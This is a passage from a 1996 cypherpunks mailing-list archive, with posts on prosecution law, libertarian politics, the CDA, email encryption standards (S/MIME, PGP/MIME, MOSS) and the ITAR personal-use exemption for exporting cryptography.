-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Sat, 17 Feb 1996 06:57:38 +0800
To: Sten Drescher <stend@grendel.texas.net>
Subject: Re: Carrying the Bible an Offense?
Message-ID: <199602162012.MAA13658@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 01:24 PM 2/15/96 -0600, Sten Drescher wrote:
>tcmay@got.net (Timothy C. May) said:
>
>TCM> There are two further points which need clearing up:
>
>TCM> 1. Private citizens (the atheist in this case) do not file
>TCM> criminal charges. They may swear out a complaint ("I witnessed
>TCM> John Doe carrying a Bible"), but they do not file criminal
>TCM> charges.
>
>	OK, how about `press charges`?  And please, don't try telling
>me that private citizen's don't `press charges`, because one of the
>well reported problems in fighting domestic violence has been the
>battered spouse (almost always the wife) refusing to press charges.

The "pressing charges" question is essentially about evidence. At certain
stages in a criminal proceeding, the prosecution must produce enough
evidence of the right kind (e.g., sworn testimony which reaches the level of
probable cause, for instance) in order for the proceedings to continue.
There are smaller hurdles pretrial (in order to create the prosecution
itself, and to hold the defendant while waiting for trial) and a bigger
hurdle at trial. The sworn testimony of a victim can be strong evidence to
help a prosecutor get over those hurdles. If there is no other evidence, the
prosecution may fail. But prosecutors and investigators who see the
reluctant victim problem coming can sometimes work around it by collecting
other evidence which can be used instead of the victim's testimony. The
victim can also be subpoenaed to testify even if they don't want to. (Of
course, their testimony may not be especially helpful under those
circumstances.) 

Thus, no, the victim does not have veto power over a prosecution, except in
those circumstances where they're fortuitously in possession or control of
the evidence the prosecution needs to prove its case. And that's a matter of
luck and circumstance, not law. 

>TCM> No prosecutor can be "forced" to prosecute, absent approval by a
>TCM> grand jury. (And if a prosecutor doesn't want to indict a ham
>TCM> sandwich, it won't be indicted.)
>
>	OK, how about this.  J Random Atheist, Jr, comes across the
>Bible on the 'net.  J Random Atheist, Sr, finds out, and is appalled,
>and swears out a complaint.  The AUSA refuses to investigate.  Could J
>Random Atheist, Sr, file a lawsuit against the AUSA because he is
>being denied equal treatment under the law?

No. J Random Atheist has no right to expect prosecutors to share his
priorities re enforcement of the laws. His remedy is to elect people with
different prosecutorial priorities.
 
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sat, 17 Feb 1996 05:09:35 +0800
To: cypherpunks@toad.com
Subject: Libertarians and crypto and such
Message-ID: <Pine.SUN.3.91.960216122745.18214B-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Isn't it the libertarian types on the list who are into mass killings of
>civilians with nukes and the "socialist statists" who tend to oppose it? 
 
Libertarians do not believe in killing civilians with nukes.  Libertarians
do not believe in murder, period.  We're not the ones calling for the
death penalty for drug lords.  We're not the ones calling for military
force in foreign countries, be they Kuwait or Bosnia.  Infact, the
Libertarian Party has often called for nuclear disarmament. 

Libertarians are interested in democratic change, not violent 
revolution.  

ObCrypto:  

William Winter, Director of Communications of the Libertarian Party, not
only ordered the Libertarian Party web site to go dark for "Black
Thursday," he also delivered an empassioned speech at the anti-CDA rally
in Washington, D.C., last saturday.

(http://www.wam.umd.edu/~tedwards/rally.html for pictures and links to
audio)

The Libertarian Party has consistantly sent out the strongest statements 
of any political party in support of cryptographic freedom and freedom of 
expression on the Internet.  
 
-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@conch.aa.msen.com (Lou Poppler)
Date: Sun, 18 Feb 1996 05:28:06 +0800
To: gw <geeman@best.com>
Subject: Re: Using lasers to communicate
In-Reply-To: <199602160803.AAA17730@news1.best.com>
Message-ID: <YJMJxMz2BsrI083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


} At 10:38 AM 2/14/96 -0500, you wrote:   [i.e. lwp@mail.msen.com == me]
} >
} >Eavesdropping and channel-blocking and physical-location-discovery are 
} >related threats to which most traditional data channels are susceptible.  
[snip]
} >larger mirror.  Then (under computer control) the various small mirrors
} >on the laser table are rapidly inserted and withdrawn from the light beam,
} >causing the laser beam to follow first one path, then another, then another
} >through the (smoky) air -- all to the delight of the audience.
} >
} >This technology could easily be adapted to make a communication channel
} >safer from the various threats of eavesdropping, interruption, and tracing.
} >A single point-to-point channel could be made to follow various paths 
} >having common elements only VERY close to the endpoints.  Better still,
} >a network of more than two nodes could be constructed without needing to
} >provide multiple transceivers at each node (and with possibly multiple 
} >beam paths between each pair).  With known methods of routing and
} >collision avoidance, we could thus not only route around any known opposition
[snip] 

On Fri, 16 Feb 1996 00:03:38 -0800, gw <geeman@best.com> wrote:

} KNOWN opposition ... hmmm.  you're back to obscurity=security.
} It's always expensive to eavesdrop (tapped any fiber cables in pressure
} jackets recently?) ... 
[snip]

I was also thinking about security by redundancy.  It is fairly 
inexpensive for an opponent simply to cut a fiber run.  The scheme
I'm talking about allows you to provide additional signal paths much more
cheaply than the opponent can interrupt them.

::::::::::::::::::::::::::::::::::::::   "He who buys for price alone is
:: Lou Poppler <lwp@mail.msen.com>  ::     [the suits'] lawful prey."
::      http://www.msen.com/~lwp/   ::  
::::::::::::::::::::::::::::::::::::::     --  John Ruskin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Sat, 17 Feb 1996 05:35:23 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Decency Act
Message-ID: <v02120d02ad4a7678970c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


bell@pacifier:

>Hey, I resent the implication, here!

        This maybe isn't the best forum for your feelings. Be a mensch and
ice the thread, OK? TIA.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 17 Feb 1996 06:18:56 +0800
To: cypherpunks@toad.com
Subject: PUR_ple
Message-ID: <199602161848.NAA21959@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-16-96. FinTim:

   "First world smartcards and third world pensioners."

      Each month, a thin line of grandparents and
      great-grandparents shuffles across the rural wilderness
      clutching fresh banknotes dished out by the most
      sophisticated cash dispensers in the world. The machines
      are the hub of a thriving market economy. Mounted on
      unmarked pick-up trucks and escorted by armed guards,
      they are pursued across the hillsides by traders
      carrying buckets of freshly slaughtered meat, caged
      chickens, and an array of traditional medicines. The
      able-bodied carry the disabled and infirm with them in
      wheelbarrows. Under makeshift awnings, every pensioner
      swipes a plastic card through the machine, then rolls a
      weathered finger across a tiny scanner which checks the
      fingerprint against a digital template and dispenses a
      monthly allowance.

      Another machine, the "smartbox", keeps a tally of its
      contents and transmits an encrypted data stream with a
      constantly updated record of deposits to its destination
      bank. If tampered with, it sprays its contents with
      indelible purple ink like that with which the security
      police once sprayed anti-apartheid protesters. No
      reports yet of the graffiti inspired by the coloured ink
      in the 1980s, when township walls proudly proclaimed:
      "The Purple Shall Govern."

   PUR_ple






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sat, 17 Feb 1996 07:41:16 +0800
To: jamesd@echeque.com
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <199602161631.IAA25897@news1.best.com>
Message-ID: <199602161957.NAA02481@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com said:

j> 1.  President Clinton declared CDA unconstitutional and directed
j> the Justice department to refrain from enforcing it.

	Then why is the Justice Department defending it?  Sorry, but
unless you can give us a citation, I can't buy this one.  I believe
that Clinton did, however, direct the Justice Department to not
enforce the abortion gag rule that got tacked on at the very end, so
maybe that's what you are thinking of.  But that wasn't part of the
CDA.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sat, 17 Feb 1996 06:33:02 +0800
To: telstar@wired.com
Subject: "US Court: Communities Can Judge Cyber-Porn"
Message-ID: <199602161915.OAA19273@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


>From LI Newsday, 2/16/96, p. A32:

"US Court: Communities Can Judge Cyber-Porn"
[Combined News Services]

  Memphis, Tenn. - In a court ruling that could have a wide impact on 
  cyberspace, a federal appeals court has decided that every community 
  can judge for itself the obscenity of material downloaded from 
  computer bulletin boards - no matter where those boards are based.

  That opinion, unless overturned by the US Supreme Courtm coult mean 
  that bulletin board material that might have been at the far edge 
  of  acceptable in New York or California could be judged by perhaps
  more conservative standards if downloaded in Tennessee or Iowa.

Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 17 Feb 1996 09:26:21 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: True democracy the electronic way
In-Reply-To: <199602161919.LAA09379@netcom15.netcom.com>
Message-ID: <Pine.SUN.3.91.960216142014.29635D-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 16 Feb 1996, L. Det^H^H^H^H^H^HVladimir Z. Nuri wrote:

> p.s. a little note to everyone here who doesn't "get it"-- a 
> guerilla measures his effectiveness by the presence of *any* response.

Only stupid guerillas who have forgotten why they got in the biz.


 S a n d y

P.S.	Here we have a perfect example of a win-win-win
	situation.  Larry gives himself an attaboy for
	getting my response ("*any* response").  I get
	to poke fun at his rationalization.  The list
	gets another data point on this fruitcake.

P.P.S.	Well, almost perfect.  My friend, Perry, for
	whom I have a great deal of respect will not
	appreciate the noise.  On this point, I have
	agreed to disagree with Perry.  I would still
	gladly take 100 more Perrygrams in exchange 
	for yet another Detweiler rant.  Perry makes
	a great deal of sense.  LD is a loon (oh yeah,
	and a great guerilla warrior...yeah right).
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Sun, 18 Feb 1996 12:25:06 +0800
To: cypherpunks@toad.com
Subject: Re: True democracy in America.
Message-ID: <199602162006.PAA17743@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Michael Peponis wrote:
> In my opinion, only the most basic of services, trash collection, road
> maintenance, education (decided upon experts, not just people with opinions.
> I don't claime to be an expert on history, so why should I have a say on how it
> is tought, I have no expertise in that area).

An off-topic quickie rant regarding "essential services" and 
"qualification"... I notice in the current tax-cutting climate (at least 
in the US) that people who resent it when garbage collectors, janitors, 
teachers, train conductors, etc. are making a "decent" wage because they 
have to pay the taxes and fees (private as well as public) for these 
services.  They seem to view the fact that they have a college degree 
makes them more entitled to a reasonable standard of living than a 
high-school drop-out...

Yet in terms of supply and demand economics, perhaps garbage collectors 
etc. deserve to be paid more than accountants and salesmen...

This has nothing to do with cypherpunks or himalayan hackers in hot tubs, 
so back to the usual data trash.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSTjqCoZzwIn1bdtAQHcmwF+LJjO9Q+6GAKVPmWyfKGOiKvPfv3/9DiY
qqNhHIIUL1AH6wzq1ccTUg1i+dg+MMH7
=pIUZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "spock" <spock@RSA.COM (Steve Dusse)>
Date: Sat, 17 Feb 1996 09:36:14 +0800
To: raph@c2.org>
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <9601168245.AA824511993@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello Ralph,

Thanks for your interest in S/MIME.  A couple of minor corrections to your 
comparison seem to be in order.

>S/MIME is an attempt to graft MIME support onto underlying PEM
>standards. See http://www.rsa.com/rsa/S-MIME/ for more info.

S/MIME integrates PKCS #7 and #10 message services (not PEM) into MIME.

>Probably the most controversial aspect of S/MIME is its signature
>format. An S/MIME signed message is a MIME multipart in which the 
>first part is the data to be signed, and the second part is a 
>complete PKCS #7 (section 10) signed message.

Although the description of this format is accurate, this format is 
only documented as an option, not the primary signature format.  This 
option has been supplied for backward compatability to address a mixed 
(S/MIME-aware and non-S/MIME aware) audience of recipients.  The 
primary signature format is a PKCS #7 signed message (including signed 
MIME content) carried in a single body part: application/x-pkcs7-mime.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Sun, 18 Feb 1996 08:51:33 +0800
To: cypherpunks@toad.com
Subject: Indian datacom freed?
Message-ID: <199602162339.PAA24210@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


The Indian Techonomist: bulletin
Copyright (C) 1996 Rishab Aiyer Ghosh. All rights reserved

Indian datacom freed?
   by Rishab Aiyer Ghosh

February 16: Today, in a "brainstorming" session to discuss
the new datacom policy proposed by The Indian Techonomist,
the Department of Telecommunications indicated its
enthusiasm for a free datacom environment in India. As no
official decision has yet been taken, I cannot make the
details public for the moment. There is one exception: the
Telecom Secretary (and Chairman, Telecom Commission) R K
Takkar has made it quite clear that content providers in
cyberspace will receive all the free-speech protections
available to other media. 

Mr Takkar said that existing laws for obscenity and national 
security were enough for the Internet, and in any case were 
not the concern of the DoT. Mr Takkar said that there was no 
need to licence on-line content providers, and indicated that 
Internet service providers would not be responsible for illegal 
content, apparently implying common carrier status for ISPs.

The other parts of the proposal, relating to low entry
barriers for ISPs and free competition met with a largely
positive response. The full text of the proposal is now
available at http://dxm.org/techonomist/news/newdcom.html

Apart from Mr Takkar and myself, present at the meeting were
Telecom Commission Members P Saran and P Khan, as well as
some other senior DoT staff.

I would like to thank Vinton Cerf and Lawrence Landweber for
the support given by the Internet Society to the proposal.

The Indian Techonomist: bulletin. http://dxm.org/techonomist/
Copyright (C) 1996 Rishab Aiyer Ghosh (rishab@techonomist.dxm.org)
Tel +91 11 6853410; Fax 6856992; H-34-C Saket New Delhi 110017 INDIA
May be distributed electronically provided that this notice is attached




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kevin S. Van Horn" <vanhorn@hks.net>
Date: Sat, 17 Feb 1996 07:48:27 +0800
To: cypherpunks@toad.com
Subject: Re: The Internet Party
Message-ID: <199602162100.QAA18002@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

talon57@well.com (Brian D Williams) wrote:
>
>Now all we need is a candidate who stands for free speech, personal
>privacy and the right to encrypt.......
>

Best-selling author Harry Browne fits the bill.  He's seeking the Libertarian
Party nomination.

Kevin S. Van Horn
vanhorn@excite.com

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSTwUyoZzwIn1bdtAQESiAGAuGYmFY81oZxFNuU/88nK4RBKWwnL7JVu
MHZp3Bm60vdyfx7MF18xwC7X/KMy3IVm
=KuMC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 17 Feb 1996 10:10:33 +0800
To: cypherpunks@toad.com
Subject: Any cpunks around San Diego, CA want to chat this weekend?
Message-ID: <Pine.ULT.3.91.960216153427.4712C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'll be down through Tuesday morning looking up public records on my new
Neo-Nazi friends (and their opposition, some of which is also unseemly),
stuff like that. I'll be talking to Ingrid, Zundel's press secretary, on
Tuesday, I hope. I'd love to do lunch with someone who knows the local San
Diego/North County/Fallbrook ISP environment, especially a level-headed
libertarian type. I'll buy. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSUan43DXUbM57SdAQHuzgP+Knsdtctdm7wcQAXKPFRlcBLqvJYK0CTT
i48kermENQgioYMqUgvXJ5H7CVO8I7+0r76TsBBv3oK9ffFUrtoqJqW5CmjTnF7y
yxIgPAVyebYPD34lIIWX7kVAPzcJL0E8M3qDO3Gty+T7Q7nj1s54tAMAdKH7V4tH
EbpQo/+9u5w=
=sX7i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sat, 17 Feb 1996 07:54:36 +0800
To: cypherpunks@toad.com
Subject: ITAR personal use exemption
Message-ID: <199602162112.QAA17479@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I just happen to be heading to the airport shortly, and am looking
forward to being among the first exports under the new rule...

-matt

------- Forwarded Message

Received: from research.att.com by nsa.tempo.att.com (8.6.10/4.7)
	id OAA17078; Fri, 16 Feb 1996 14:15:37 -0500
Received: from cs.cosc.georgetown.edu by research; Fri Feb 16 14:16:40 EST 1996
Received: from chair.georgetown.edu (chair.cosc.georgetown.edu) by cs.cosc.georgetown.edu (4.1/1a-eef)
	id AA00958; Fri, 16 Feb 96 14:13:43 EST
Date: Fri, 16 Feb 96 14:13:43 EST
From: denning@cs.cosc.georgetown.edu (Dorothy Denning)
Message-Id: <9602161913.AA00958@cs.cosc.georgetown.edu>
To: mab@research.att.com
Subject: ITAR Amended to Allow Personal Use Exemption
Cc: denning@cs.cosc.georgetown.edu

In case you haven't heard ...

Best regards,
Dorothy
- --------

Today's Federal Register contains a notice from the Department of
State, Bureau of Political Military Affairs, announcing final rule of
an amendment to the International Traffic in Arms Regulation (ITAR)
allowing U.S. persons to temporarily export cryptographic products for
personal use without the need for an export license.  The product must
not be intended for copying, demonstration, marketing, sale, re-export,
or transfer of ownership or control.  It must remain in the possession
of the exporting person, which includes being locked in a hotel room or
safe.  While in transit, it must be with the person's accompanying
baggage.  Exports to certain countries are prohibited -- currently
Cuba, Iran, Iraq, Libya, North Korea, Sudan, and Syria.  The exporter
must maintain records of each temporary export for five years.  See
Federal Register, Vol. 61, No. 33, Friday, February 16, 1996, Public
Notice 2294, pp. 6111-6113.

Dorothy Denning 

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kevin S. Van Horn" <vanhorn@hks.net>
Date: Sat, 17 Feb 1996 07:57:46 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
Message-ID: <199602162120.QAA18116@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tallpaul@pipeline.com (tallpaul) wrote:
> 
>Isn't it the libertarian types on the list who are into mass killings of
>civilians with nukes and the "socialist statists" who tend to oppose it? 

No.

Tim May is the first person I've ever encountered who calls himself a
libertarian and yet thinks dropping the Bomb on Hiroshima and Nagasaki
was justified.  I think that, from a consistent libertarian perspective,
using the Bomb was equivalent to taking out a Mafia chieftain by napalming
the neighborhood in which he lived.  Perhaps the bad guy being targetted was
a killer who deserved to die, but that doesn't justify snuffing his neighbors.

Kevin S. Van Horn
vanhorn@excite.com

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMST1ESoZzwIn1bdtAQFCegGAyCaAyaqlvc9RH5spAgrCDdmDJZkZdLTP
S3xc/wODYWYfEiSPv0v5FPIMCZ7k2lj/
=0HrG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Sat, 17 Feb 1996 09:04:49 +0800
To: cypherpunks@toad.com
Subject: ITAR Amended to Allow Personal Use Exemptions
Message-ID: <199602162229.QAA28245@parka>
MIME-Version: 1.0
Content-Type: text




Today's Federal Register contains a notice from the Department of
State, Bureau of Political Military Affairs, announcing final rule of
an amendment to the International Traffic in Arms Regulation (ITAR)
allowing U.S. persons to temporarily export cryptographic products for
personal use without the need for an export license.  The product must
not be intended for copying, demonstration, marketing, sale, re-export,
or transfer of ownership or control.  It must remain in the possession
of the exporting person, which includes being locked in a hotel room or
safe.  While in transit, it must be with the person's accompanying
baggage.  Exports to certain countries are prohibited -- currently
Cuba, Iran, Iraq, Libya, North Korea, Sudan, and Syria.  The exporter
must maintain records of each temporary export for five years.  See
Federal Register, Vol. 61, No. 33, Friday, February 16, 1996, Public
Notice 2294, pp. 6111-6113.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Sat, 17 Feb 1996 03:48:46 +0800
To: cypherpunks@toad.com
Subject: Re: Looking for GSM A5 info
Message-ID: <8118.9602161648@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



<somogyi@digmedia.com> writes... 
> I'm looking for information about the A5 encryption algorithm used in
> GSM phones. Specifically:
> 
[...........deleted............]
> 
> Any related information, or pointers to related information,
> appreciated greatly.
> 
> ________________________________________________________________________
> Stephan Somogyi                Mr Gyroscope                Digital Media
> 
> 

I have a post to sci.crypt from Jun 1994 stored on my web pages that has a fair
amount of information on A5 along with an implementation. I can not guarentee
that the details are accurate but they may well be of some use. Try:

http://chem.leeds.ac.uk/ICAMS/people/jon/a5.html

Jon C. Baber
jbaber@mi.leeds.ac.uk
http://chem.leeds.ac.uk/ICAMS/people/jon/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 17 Feb 1996 09:22:45 +0800
To: jya@pipeline.com (John Young)
Subject: Re: DES_ono
In-Reply-To: <199602151707.MAA24559@pipe2.nyc.pipeline.com>
Message-ID: <199602162252.QAA27785@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:

>   Citing the crypto-expert BSA study noted here by Matt
>   Blaze, Computerworld of 2-12-96:

>   "Standard Encryption Vulnerable To Attack. Banking's most
>   trusted technique for funds transfer questioned."

So the banker's finally figured out what the NSA told us 14 years ago?
Great.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurence Lundblade <lgl@qualcomm.com>
Date: Sat, 17 Feb 1996 11:05:09 +0800
To: Raph Levien <pem-dev@neptune.tis.com
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199602142049.MAA20108@infinity.c2.org>
Message-ID: <v03004d0cad4ac6d75935@[129.46.110.231]>
MIME-Version: 1.0
Content-Type: text/plain


Raph, your summary is very useful!  I would like to make a few comments and
suggest a model for breaking down an email encryption system into four
components: the trust model, the key/certificate distribution system, the
on-the-wire certificate data structure and the on-the-wire transport data
structure.  The comments:

At 12:49 PM 2/14/96, Raph Levien wrote:
>....
> An additional grave concern is key management. Contrary to some
>beliefs, key management is not a solved problem. All of the proposals
>contain some mechanism for key management, but none of them have been
>demonstrated to be scalable to an Internet-wide email system. My
>belief is that the problems with key management do not stem from the
>classic Web of trust/certification hierarchy split, but the
>nonexistence of a distributed database (with nice interfaces) for
>holding keys. The encryption protocols also stand in the way of such a
>database, with key formats that are either overly complex, inadequate,
>or both.

Here here! agreed!


>   S/MIME remains firmly grounded in the X.509 certification
>hierarchy, although the FAQ claims that the guidelines for hierarchies
>are "more flexible" than in PEM.

X.509 v3 explicitly does allow for more flexibility.  To quote from section
12.4.1:

 g) Complete flexibility in trust models is required.  A strict hierarchical
    model which is adequate for a single organization is not adequate when
    considering the needs of multiple interconnected enterprises.  Flexibility
    is required in the selection of the first trusted CA in a certification
    path.  In particular, it should be possible to require that the
    certification path start in the local security domain of the public-key
    user system.


>   Probably the most controversial aspect of S/MIME is its signature
>format. An S/MIME signed message is a MIME multipart in which the
>first part is the data to be signed, and the second part is a complete
>PKCS #7 (section 10) signed message.

It is certainly technically possible to use the multipart/signed format
from RFC-1847 (also used in PGP/MIME) with PKCS #7.  It certainly seems
superior is almost every way to the multipart/alternative in the current
S/MIME draft.  Also Steve D. pointed out that the multipart/alternative
format is not the primary signature format.


Going back to breaking things down into four parts, these are some points I
know about.  Please correct me if I say something wrong and pardon some of
the details most of us already know:

The Trust Model
---------------
Any fully implemented system will have to choose some form of a trust
model.  Some possibilities are:
  * web of trust
  * strict hierarchy
  * web of hierarchies or some other hybrid

The important thing here is that there are many trust models that are valid
and useful and it may be useful for other components of the system to be
neutral to the trust model as is clearly the case with MOSS.

The Key Distribution System
---------------------------
A lot of components may go into this (protocols, client/server
architectures, local key stores) and it is probably the most complicated
part of any system.  Some options are:
  * distribution of keys manually via e-mail
  * automatic non-interactive lookup of keys from a server
  * interactive browsing of a key store for keys
  * revocation lists or none
  * online certificate verification via a secure channel
  * certificate caching

Probably the best thing to say, is that there's a lot of work to do here.

The Certificate format
----------------------
It seems possible to pick a certificate format independent of the other
issues.  Doing so would allow us to leverage components like we do with
other data objects like MIME.  There probably only two major contenders:
  * X.509 v3
     + broadly supported by standard bodies
     + supported by several industries (e.g., banking)
     + very rich and flexible
     + ASN.1
     - ASN.1 (tough for a student to get an ASN.1 compiler)
     - complicated
  * PGP keys
     + widely deployed
     + simple to write code for
     - difficult to lookup (linear search on key id required)
     - too simple to support many trust models and distribution systems

Note that both use the RSA algorithms, so they are interchangeable at some
very basic level.

The Transport of Content format
-------------------------------
This is the format of the actual message that is sent from one user to the
next.  I'm going to discard anything that doesn't handle MIME because I
don't think they are important any more.  Raph described a lot of this so
I'll just mention a few considerations explicitly about transport formats.
   * PGP/MIME
       From a data structure format this is a compact binary format.  It
       seems reasonable to implement, is documented and requires no special
       tools.  There is a performance problem with key look ups
       for signed message because a linear search is required unless the
       key or other data is always included with the message.

   * S/MIME  (PKCS + MIME)
       Uses PKCS format with some MIME formatting.  The main problems here
       are the multipart/alternative format for signatures and the ASN.1
       requirement.  An ASN.1 compiler is required to implement this.  PKCS
       has actually been around for a while and has been used for a number
       of cryptographic systems.

   * MOSS
       MOSS is perhaps the easiest to implement and the most flexible since
       it is an ASCII text protocol like other Internet protocols and because
       it explicitly supports several trust models.

I think the most important observation is that PGP/MIME and MOSS share the
security multiparts structure from RFC 1847.  It is also possible to use
the security multiparts format with PKCS #7 and thus S/MIME could be
changed to support it.  If this happened we'd have something in common for
all formats and it would make life much easier for all e-mail client
authors.  An added bonus is that RFC-1847 support allows an e-mail client
to support encryption and signing of full MIME entities with an external
program that can be configured like MIME content viewers are with something
like the mailcap facility.  It can be something as simple as a UNIX pipe to
a command like pgp.

Laurence Lundblade      <lgl@qualcomm.com>
QUALCOMM Inc.           619-658-3584










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 17 Feb 1996 08:48:16 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Text of personal use exemption
Message-ID: <Pine.SUN.3.91.960216171510.14444M-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.law.miami.edu/~froomkin/personal-use.txt

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 17 Feb 1996 09:13:00 +0800
To: samman-ben@CS.YALE.EDU
Subject: Re: anonymous age credentials, sharing of
Message-ID: <01I1AFAUEXFKA0V3BM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"samman-ben@CS.YALE.EDU"  "Rev. Ben" 15-FEB-1996 20:05:34.89

>The only REAL way of authentication is biometrics.  Anything else can be 
>swapped.  But if you amputate someone's hand or retinas then they won't 
>work(check for things like blood flow, etc.)

	Actually, a simulation ought to work pretty well at fooling most extant
devices, and any devices likely to be developed soon. Now, fooling the guards
watching you at a secure site may be a problem (a hand up your sleeve?), as
may getting someone else's biometric information in the first place. The
latter gets into the area of cryptography since whoever has such information
(other than the original possessor) is likely to hash it anyway.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Sat, 17 Feb 1996 09:33:35 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: anonymous age credentials, sharing of
In-Reply-To: <199602160754.XAA17607@news1.best.com>
Message-ID: <Pine.A32.3.91.960216174948.14448F-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> >The only REAL way of authentication is biometrics.  Anything else can be 
> >swapped.  
